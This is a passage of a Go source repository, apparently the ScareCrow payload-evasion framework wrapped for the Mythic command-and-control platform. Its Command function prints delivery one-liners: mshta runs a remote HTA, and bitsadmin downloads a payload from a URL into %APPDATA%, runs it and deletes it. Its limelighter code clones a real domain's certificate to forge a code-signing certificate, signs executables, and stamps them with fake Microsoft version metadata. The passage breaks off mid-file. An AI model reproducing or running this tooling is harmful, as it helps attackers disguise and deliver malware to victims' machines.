83 | os.MkdirAll(fpath, os.ModePerm) 84 | continue 85 | } 86 | if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil { 87 | return filenames, err 88 | } 89 | outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode()) 90 | if err != nil { 91 | return filenames, err 92 | } 93 | rc, err := f.Open() 94 | if err != nil { 95 | return filenames, err 96 | } 97 | _, err = io.Copy(outFile, rc) 98 | outFile.Close() 99 | rc.Close() 100 | 101 | if err != nil { 102 | return filenames, err 103 | } 104 | } 105 | return filenames, nil 106 | } 107 | 108 | func B64decode(name string) { 109 | dec, err := base64.StdEncoding.DecodeString(base64string) 110 | if err != nil { 111 | panic(err) 112 | } 113 | f, err := os.Create(name) 114 | if err != nil { 115 | panic(err) 116 | } 117 | defer f.Close() 118 | if _, err := f.Write(dec); err != nil { 119 | panic(err) 120 | } 121 | if err := f.Sync(); err != nil { 122 | panic(err) 123 | } 124 | } 125 | 126 | func Zipit(source, target string) error { 127 | zipfile, err := os.Create(target) 128 | if err != nil { 129 | return err 130 | } 131 | defer zipfile.Close() 132 | archive := zip.NewWriter(zipfile) 133 | defer archive.Close() 134 | info, err := os.Stat(source) 135 | if err != nil { 136 | return nil 137 | } 138 | var baseDir string 139 | if info.IsDir() { 140 | baseDir = filepath.Base(source) 141 | } 142 | filepath.Walk(source, func(path string, info os.FileInfo, err error) error { 143 | if err != nil { 144 | return err 145 | } 146 | header, err := zip.FileInfoHeader(info) 147 | if err != nil { 148 | return err 149 | } 150 | if baseDir != "" { 151 | header.Name = filepath.Join(baseDir, strings.TrimPrefix(path, source)) 152 | } 153 | if info.IsDir() { 154 | header.Name += "/" 155 | } else { 156 | header.Method = zip.Deflate 157 | } 158 | writer, err := archive.CreateHeader(header) 159 | if err != nil { 160 | return err 161 | } 162 | if info.IsDir() { 163 | return nil 164 | } 165 | file, err := os.Open(path) 166 | if err != nil { 167 | return err 168 | } 169 | defer file.Close() 170 | _, err = io.Copy(writer, file) 171 | return err 172 | 173 | }) 174 | return err 175 | } 176 | 177 | func Command(URL string, CommandLoader string, outFile string) string { 178 | 179 | if URL != "" && CommandLoader == "hta" { 180 | fmt.Println("[*] HTA Payload") 181 | fmt.Println("[!] Can be executed manually by a user or embeded into a one liner command that executes it:") 182 | if strings.HasSuffix(URL, "/") { 183 | fmt.Println("mshta.exe " + URL + outFile) 184 | } else { 185 | fmt.Println("mshta.exe " + URL + "/" + outFile) 186 | } 187 | } 188 | if URL == "" && !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") { 189 | fmt.Println(color.GreenString("[+] ") + "Non Executable file extension detected. Either add the extension \".js\" or use the following to execute it (note that this works from a local instance, webdav or fileshare... not a webserver):") 190 | fmt.Println("cscript //E:jscript " + outFile + "") 191 | } 192 | if URL != "" && CommandLoader == "macro" { 193 | if strings.HasSuffix(URL, "/") { 194 | } else { 195 | URL = URL + "/" 196 | } 197 | fmt.Println("[*] Macro Delivery Payload") 198 | fmt.Println("[!] Excel macro that will download, execute and remove the payload:") 199 | } 200 | 201 | if URL != "" && CommandLoader == "bits" { 202 | fmt.Println("[*] Bitsadmin") 203 | fmt.Println("[!] One liner command to execute it:") 204 | if !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") && !strings.Contains(outFile, ".cpl") && !strings.Contains(outFile, ".exe") { 205 | if strings.HasSuffix(URL, "/") { 206 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "") 207 | } else { 208 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "") 209 | } 210 | } else { 211 | if strings.HasSuffix(URL, "/") { 212 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "") 213 | } else { 214 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "") 215 | 216 | } 217 | } 218 | } 219 | return URL 220 | } 221 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.mod: -------------------------------------------------------------------------------- 1 | module ScareCrow 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/akavel/rsrc v0.9.0 // indirect 7 | github.com/fatih/color v1.9.0 8 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca 9 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 // indirect 10 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c 11 | ) 12 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.sum: -------------------------------------------------------------------------------- 1 | github.com/akavel/rsrc v0.9.0 h1:HwUDC0+tMFWqN4D5G+o5siGD4oVsC3jn6zM8ocjc3nY= 2 | github.com/akavel/rsrc v0.9.0/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c= 3 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s= 4 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= 5 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 6 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca h1:ozPUX9TKQZVek4lZWYRsQo7uS8vJ+q4OOHvRhHiCLfU= 7 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca/go.mod h1:eJTEwMjXb7kZ633hO3Ln9mBUCOjX2+FlTljvpl9SYdE= 8 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 9 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 10 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 11 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= 12 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 13 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= 14 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= 15 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= 16 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 h1:+n/aFZefKZp7spd8DFdX7uMikMLXX4oubIzJF4kv/wI= 17 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3/go.mod h1:RagcQ7I8IeTMnF8JTXieKnO4Z6JCsikNEzj0DwauVzE= 18 | github.com/rogpeppe/go-internal v1.7.1-0.20210131190821-dc4b49510d96/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc= 19 | github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= 20 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae h1:LLvf5CCPekfeUlqQDGfVvds1kMf4hBfcAkpzYHqjYV4= 21 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae/go.mod h1:oWzR58pjEbqmQK35Wh+slsMO3H4Chi/24zVIyqJfWNI= 22 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 23 | golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= 24 | golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 25 | golang.org/x/mod v0.4.1 h1:Kvvh58BN8Y9/lBi7hTekvtMpm07eUZ0ck5pRHpsMWrY= 26 | golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= 27 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 28 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= 29 | golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= 30 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 31 | golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 32 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 33 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 34 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 35 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 36 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae h1:Ih9Yo4hSPImZOpfGuA4bR/ORKTAbhZo2AbWNRCnevdo= 37 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 38 | golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 39 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 40 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 41 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 42 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 43 | golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 44 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9 h1:lQ9QDTM4SHDP/S/bmj2wjNMQ93AvRYf7kuoqr2MDxmc= 45 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9/go.mod h1:9bzcO0MWcOuT0tm1iBGzDVPshzfwoVvREIui8C+MHqU= 46 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 47 | golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 48 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 49 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= 50 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 51 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 52 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= 53 | mvdan.cc/garble v0.2.0 h1:EcSXSbx2ocE42m1tpbSPh0MBu6uYewWj82qyWfXjr7s= 54 | mvdan.cc/garble v0.2.0/go.mod h1:9htOtPZGNFoUyS7Y/R/T7vfnEi386kmsOAhNEoc24ts= 55 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/limelighter/limelighter.go: -------------------------------------------------------------------------------- 1 | package limelighter 2 | 3 | import ( 4 | "bytes" 5 | "crypto/rand" 6 | "crypto/rsa" 7 | "crypto/tls" 8 | "crypto/x509" 9 | "crypto/x509/pkix" 10 | "encoding/pem" 11 | "fmt" 12 | "io" 13 | "io/ioutil" 14 | "log" 15 | crand "math/rand" 16 | "os" 17 | "os/exec" 18 | "strings" 19 | "time" 20 | 21 | "github.com/josephspurrier/goversioninfo" 22 | ) 23 | 24 | const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" 25 | 26 | func VarNumberLength(min, max int) string { 27 | var r string 28 | crand.Seed(time.Now().UnixNano()) 29 | num := crand.Intn(max-min) + min 30 | n := num 31 | r = RandStringBytes(n) 32 | return r 33 | } 34 | func RandStringBytes(n int) string { 35 | b := make([]byte, n) 36 | for i := range b { 37 | b[i] = letters[crand.Intn(len(letters))] 38 | 39 | } 40 | return string(b) 41 | } 42 | 43 | func GenerateCert(domain string, inputFile string) { 44 | var err error 45 | rootKey, err := rsa.GenerateKey(rand.Reader, 4096) 46 | if err != nil { 47 | panic(err) 48 | } 49 | certs, err := GetCertificatesPEM(domain + ":443") 50 | if err != nil { 51 | os.Chdir("..") 52 | foldername := strings.Split(inputFile, ".") 53 | os.RemoveAll(foldername[0]) 54 | log.Fatal("Error: The domain: " + domain + " does not exist or is not accessible from the host you are compiling on") 55 | } 56 | block, _ := pem.Decode([]byte(certs)) 57 | cert, _ := x509.ParseCertificate(block.Bytes) 58 | 59 | keyToFile(domain+".key", rootKey) 60 | 61 | SubjectTemplate := x509.Certificate{ 62 | SerialNumber: cert.SerialNumber, 63 | Subject: pkix.Name{ 64 | CommonName: cert.Subject.CommonName, 65 | }, 66 | NotBefore: cert.NotBefore, 67 | NotAfter: cert.NotAfter, 68 | BasicConstraintsValid: true, 69 | IsCA: true, 70 | KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, 71 | ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth, x509.ExtKeyUsageClientAuth}, 72 | } 73 | IssuerTemplate := x509.Certificate{ 74 | SerialNumber: cert.SerialNumber, 75 | Subject: pkix.Name{ 76 | CommonName: cert.Issuer.CommonName, 77 | }, 78 | NotBefore: cert.NotBefore, 79 | NotAfter: cert.NotAfter, 80 | } 81 | derBytes, err := x509.CreateCertificate(rand.Reader, &SubjectTemplate, &IssuerTemplate, &rootKey.PublicKey, rootKey) 82 | if err != nil { 83 | panic(err) 84 | } 85 | certToFile(domain+".pem", derBytes) 86 | 87 | } 88 | 89 | func keyToFile(filename string, key *rsa.PrivateKey) { 90 | file, err := os.Create(filename) 91 | if err != nil { 92 | panic(err) 93 | } 94 | defer file.Close() 95 | b, err := x509.MarshalPKCS8PrivateKey(key) 96 | if err != nil { 97 | fmt.Fprintf(os.Stderr, "Unable to marshal RSA private key: %v", err) 98 | os.Exit(2) 99 | } 100 | if err := pem.Encode(file, &pem.Block{Type: "RSA PRIVATE KEY", Bytes: b}); err != nil { 101 | panic(err) 102 | } 103 | } 104 | 105 | func certToFile(filename string, derBytes []byte) { 106 | certOut, err := os.Create(filename) 107 | if err != nil { 108 | log.Fatalf("[-] Failed to Open cert.pem for Writing: %s", err) 109 | } 110 | if err := pem.Encode(certOut, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}); err != nil { 111 | log.Fatalf("[-] Failed to Write Data to cert.pem: %s", err) 112 | } 113 | if err := certOut.Close(); err != nil { 114 | log.Fatalf("[-] Error Closing cert.pem: %s", err) 115 | } 116 | } 117 | 118 | func GetCertificatesPEM(address string) (string, error) { 119 | conn, err := tls.Dial("tcp", address, &tls.Config{ 120 | InsecureSkipVerify: true, 121 | }) 122 | if err != nil { 123 | return "", err 124 | } 125 | defer conn.Close() 126 | var b bytes.Buffer 127 | for _, cert := range conn.ConnectionState().PeerCertificates { 128 | err := pem.Encode(&b, &pem.Block{ 129 | Type: "CERTIFICATE", 130 | Bytes: cert.Raw, 131 | }) 132 | if err != nil { 133 | return "", err 134 | } 135 | } 136 | return b.String(), nil 137 | } 138 | 139 | func GeneratePFK(password string, domain string) { 140 | cmd := exec.Command("openssl", "pkcs12", "-export", "-out", domain+".pfx", "-inkey", domain+".key", "-in", domain+".pem", "-passin", "pass:"+password+"", "-passout", "pass:"+password+"") 141 | err := cmd.Run() 142 | if err != nil { 143 | log.Fatalf("cmd.Run() failed with %s\n", err) 144 | } 145 | } 146 | 147 | func SignExecutable(password string, pfx string, filein string, fileout string) { 148 | cmd := exec.Command("osslsigncode", "sign", "-pkcs12", pfx, "-in", ""+filein+"", "-out", ""+fileout+"", "-pass", ""+password+"") 149 | err := cmd.Run() 150 | if err != nil { 151 | log.Fatalf("cmd.Run() failed with %s\n", err) 152 | } 153 | } 154 | 155 | func FileProperties(name string, configFile string) string { 156 | fmt.Println("[*] Creating an Embedded Resource File") 157 | vi := &goversioninfo.VersionInfo{} 158 | if configFile != "" { 159 | var err error 160 | input := io.ReadCloser(os.Stdin) 161 | if input, err = os.Open("../" + configFile); err != nil { 162 | log.Printf("Cannot open %q: %v", configFile, err) 163 | os.Exit(3) 164 | } 165 | jsonBytes, err := ioutil.ReadAll(input) 166 | input.Close() 167 | if err != nil { 168 | log.Printf("Error reading %q: %v", configFile, err) 169 | os.Exit(3) 170 | } 171 | if err := vi.ParseJSON(jsonBytes); err != nil { 172 | log.Printf("Could not parse the .json file: %v", err) 173 | os.Exit(3) 174 | } 175 | name = vi.StringFileInfo.InternalName 176 | } else if configFile == "" { 177 | if name == "APMon" { 178 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 179 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 180 | vi.StringFileInfo.FileDescription = "Adaptive Port Monitor" 181 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 182 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 183 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll" 184 | vi.FixedFileInfo.ProductVersion.Patch = 18362 185 | vi.FixedFileInfo.ProductVersion.Major = 10 186 | vi.FixedFileInfo.ProductVersion.Minor = 0 187 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 188 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 189 | vi.FixedFileInfo.FileVersion.Major = 1 190 | vi.FixedFileInfo.FileVersion.Minor = 0 191 | vi.FixedFileInfo.FileVersion.Patch = 18362 192 | vi.FixedFileInfo.FileVersion.Build = 1 193 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 194 | } 195 | if name == "bisr" { 196 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 197 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 198 | vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service" 199 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 200 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 201 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll" 202 | vi.FixedFileInfo.ProductVersion.Patch = 18362 203 | vi.FixedFileInfo.ProductVersion.Major = 10 204 | vi.FixedFileInfo.ProductVersion.Minor = 0 205 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 206 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 207 | vi.FixedFileInfo.FileVersion.Major = 1 208 | vi.FixedFileInfo.FileVersion.Minor = 0 209 | vi.FixedFileInfo.FileVersion.Patch = 18362 210 | vi.FixedFileInfo.FileVersion.Build = 1 211 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 212 | } 213 | if name == "btpanui" { 214 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 215 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 216 | vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface" 217 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 218 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 219 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll" 220 | vi.FixedFileInfo.ProductVersion.Patch = 18362 221 | vi.FixedFileInfo.ProductVersion.Major = 10 222 | vi.FixedFileInfo.ProductVersion.Minor = 0 223 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 224 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 225 | vi.FixedFileInfo.FileVersion.Major = 1 226 | vi.FixedFileInfo.FileVersion.Minor = 0 227 | vi.FixedFileInfo.FileVersion.Patch = 18362 228 | vi.FixedFileInfo.FileVersion.Build = 1 229 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 230 | } 231 | if name == "cmdext" { 232 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 233 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 234 | vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL" 235 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 236 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 237 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll" 238 | vi.FixedFileInfo.ProductVersion.Patch = 18362 239 | vi.FixedFileInfo.ProductVersion.Major = 10 240 | vi.FixedFileInfo.ProductVersion.Minor = 0 241 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 242 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 243 | vi.FixedFileInfo.FileVersion.Major = 1 244 | vi.FixedFileInfo.FileVersion.Minor = 0 245 | vi.FixedFileInfo.FileVersion.Patch = 18362 246 | vi.FixedFileInfo.FileVersion.Build = 1 247 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 248 | } 249 | if name == "httpapi" { 250 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 251 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 252 | vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API" 253 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 254 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 255 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll" 256 | vi.FixedFileInfo.ProductVersion.Patch = 18362 257 | vi.FixedFileInfo.ProductVersion.Major = 10 258 | vi.FixedFileInfo.ProductVersion.Minor = 0 259 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 260 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 261 | vi.FixedFileInfo.FileVersion.Major = 1 262 | vi.FixedFileInfo.FileVersion.Minor = 0 263 | vi.FixedFileInfo.FileVersion.Patch = 18362 264 | vi.FixedFileInfo.FileVersion.Build = 1 265 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 266 | } 267 | if name == "logoncli" { 268 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 269 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 270 | vi.StringFileInfo.FileDescription = "Net Logon Client DLL" 271 | vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)" 272 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 273 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll" 274 | vi.FixedFileInfo.ProductVersion.Patch = 18362 275 | vi.FixedFileInfo.ProductVersion.Major = 10 276 | vi.FixedFileInfo.ProductVersion.Minor = 0 277 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 278 | vi.StringFileInfo.ProductVersion = "10.0.18362.1237" 279 | vi.FixedFileInfo.FileVersion.Major = 1 280 | vi.FixedFileInfo.FileVersion.Minor = 0 281 | vi.FixedFileInfo.FileVersion.Patch = 18362 282 | vi.FixedFileInfo.FileVersion.Build = 1237 283 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 284 | } 285 | if name == "netlogon" { 286 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 287 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 288 | vi.StringFileInfo.FileDescription = "Net Logon Services DLL" 289 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 290 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 291 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll" 292 | vi.FixedFileInfo.ProductVersion.Patch = 18362 293 | vi.FixedFileInfo.ProductVersion.Major = 10 294 | vi.FixedFileInfo.ProductVersion.Minor = 0 295 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 296 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 297 | vi.FixedFileInfo.FileVersion.Major = 1 298 | vi.FixedFileInfo.FileVersion.Minor = 0 299 | vi.FixedFileInfo.FileVersion.Patch = 18362 300 | vi.FixedFileInfo.FileVersion.Build = 1 301 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 302 | } 303 | if name == "tcpmon" { 304 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 305 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 306 | vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL" 307 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 308 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 309 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll" 310 | vi.FixedFileInfo.ProductVersion.Patch = 18362 311 | vi.FixedFileInfo.ProductVersion.Major = 10 312 | vi.FixedFileInfo.ProductVersion.Minor = 0 313 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 314 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 315 | vi.FixedFileInfo.FileVersion.Major = 1 316 | vi.FixedFileInfo.FileVersion.Minor = 0 317 | vi.FixedFileInfo.FileVersion.Patch = 18362 318 | vi.FixedFileInfo.FileVersion.Build = 1 319 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 320 | } 321 | if name == "OneNote" { 322 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 323 | vi.StringFileInfo.InternalName = "OneNote" 324 | vi.StringFileInfo.FileDescription = "Microsoft OneNote" 325 | vi.StringFileInfo.FileVersion = "16.0.13901.20462" 326 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 327 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE" 328 | vi.FixedFileInfo.ProductVersion.Patch = 13901 329 | vi.FixedFileInfo.ProductVersion.Major = 16 330 | vi.FixedFileInfo.ProductVersion.Minor = 0 331 | vi.StringFileInfo.ProductName = "Microsoft Office" 332 | vi.StringFileInfo.ProductVersion = "16.0.13901.20462" 333 | vi.FixedFileInfo.FileVersion.Major = 16 334 | vi.FixedFileInfo.FileVersion.Minor = 0 335 | vi.FixedFileInfo.FileVersion.Patch = 13901 336 | vi.FixedFileInfo.FileVersion.Build = 20462 337 | vi.StringFileInfo.InternalName = "OneNote" 338 | } 339 | 340 | if name == "Excel" { 341 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 342 | vi.StringFileInfo.InternalName = "Excel" 343 | vi.StringFileInfo.FileDescription = "Microsoft Excel" 344 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 345 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 346 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" 347 | vi.FixedFileInfo.ProductVersion.Patch = 11929 348 | vi.FixedFileInfo.ProductVersion.Major = 16 349 | vi.FixedFileInfo.ProductVersion.Minor = 0 350 | vi.StringFileInfo.ProductName = "Microsoft Office" 351 | vi.StringFileInfo.ProductVersion = 